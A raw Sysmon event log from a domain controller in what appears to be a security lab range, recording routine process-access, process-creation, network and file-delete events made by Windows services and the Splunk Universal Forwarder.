13:58:18.214{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201359Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.214{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201358Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.214{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201357Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.214{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201356Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.214{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E77A-6040-FF4D-00000000AD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201355Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.214{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E77A-6040-FF4D-00000000AD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201354Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.215{5ABCFE62-E77A-6040-FF4D-00000000AD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002201387Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.542{5ABCFE62-E77B-6040-014E-00000000AD01}67722784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201386Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.417{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E77B-6040-014E-00000000AD01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201385Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.417{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201384Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.417{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201383Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.417{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201382Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.417{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201381Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.417{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E77B-6040-014E-00000000AD01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201380Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.417{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E77B-6040-014E-00000000AD01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201379Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.419{5ABCFE62-E77B-6040-014E-00000000AD01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002201378Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:14.941{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55207-false10.0.1.12-8000- 23542300x80000000000000002201377Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.370{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7EEED02B590CB305D9FF43474DDC71E9,SHA256=F592F8EE5229F4339053438CCAF82BABDB75DEA58166AC4F4373CF4F858945DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201376Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.261{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7677987FCD2CD8FE3089A044E454D846,SHA256=618C91E8374D8D8A5E6472CB798A371989A2825F4D2647DCC42B1F4EB275C206,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201375Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.011{5ABCFE62-E77A-6040-004E-00000000AD01}39125556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201393Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:20.464{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=450DBA039747579558067C1B2AABD5C0,SHA256=0490F15465D10377BA94A5C39CF5C8A2AEC2E5A8342859C45905017A20C67FA3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201392Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:16.442{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55209-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002201391Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:16.442{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55209-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002201390Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:16.437{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55208-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002201389Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:16.437{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55208-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 23542300x80000000000000002201388Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:20.276{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7605AFF396181D3C8648580B38ABB871,SHA256=41919E90B73D26C96581F892D2BCF69C75C2351D446A9355D17EE52276B12BA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201394Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:21.276{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71B32F23A8F44D2DBE293FA43669DABA,SHA256=DBA5A72AB538C51FCACA3C25C57F1FC32527C678D525673284F90C16B59BB23D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201396Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:22.292{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD1E909AF07F7D62CD97C163A7C93AD4,SHA256=F8E12804CFFE1BAF7FA58513759B90FA5BDF9612A79FFE7FBE906B0AA45ADCFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201395Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:22.198{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=79C9857AC783DFA7828783E70E763761,SHA256=7AA43D089E0B9442B7C5D8BD59F91453FB2ED07F6B3293792435147F10E46EB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201398Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:23.323{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=920D22CB14FEF084E56529EF2162F077,SHA256=17C6EA32AA5188B8EE56F95FFA9DFFF04659987F4E93616CC98C45C1D08E6812,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201397Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:23.323{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=750FAC86FC09804C4DFAF0BD74562316,SHA256=959DF2DEC014C715D604F847D87E8EEF5361CEAF983BE0FFB5183FD7C9A616D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201400Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:19.988{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55210-false10.0.1.12-8000- 23542300x80000000000000002201399Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:24.339{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E66E36BFF6B9A5ACFECCDD525893C063,SHA256=0621557352EEB30180E469D9CF6C3ECC9E332F3AB72C598A95195729DA6E4D3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201401Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:25.355{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F8554FBB34AF76BF8A5DD221128DE17,SHA256=A65CE1D7467F356A5DB0DDEA2E40E158D16EBCB2C8109F8646E652063B0AAF90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201403Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:26.573{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26C5F7D2DC9F770037B7030879EB7905,SHA256=5F8C362D16817E774E696C852C21AC42B0762C284729478EA70D4F48CC54E206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201402Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:26.370{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07641C4F99D072D08EE35ADABDBCED15,SHA256=A09B6707581C9BADD7E2E00A629DD2C0CAE9A958B9C1A6BFEAA2E1DA9C5A4706,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201404Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:27.386{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB7608535FC8C5B995CA20BCC60B3A3D,SHA256=2E35CD610CCCD915A3D061D71F9502DC02D6379DDC8C146614D733040E0B8C35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201406Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:28.386{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00AE071F6EA6924E5E03C0E2A48332D4,SHA256=9EE9A4BFC443607C751E9DAEC4E5F5AC2D49E99ABA7DAD929FE3E2A2279F654D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201405Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:28.230{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=363331F972D5E8C710948334AC67F6C1,SHA256=1D261EC2D74F50D64CD9C11C2FEF8E698FF03235DCB14E08A1DEF1B3486C4981,IMPHASH=00000000000000000000000000000000falsetrue 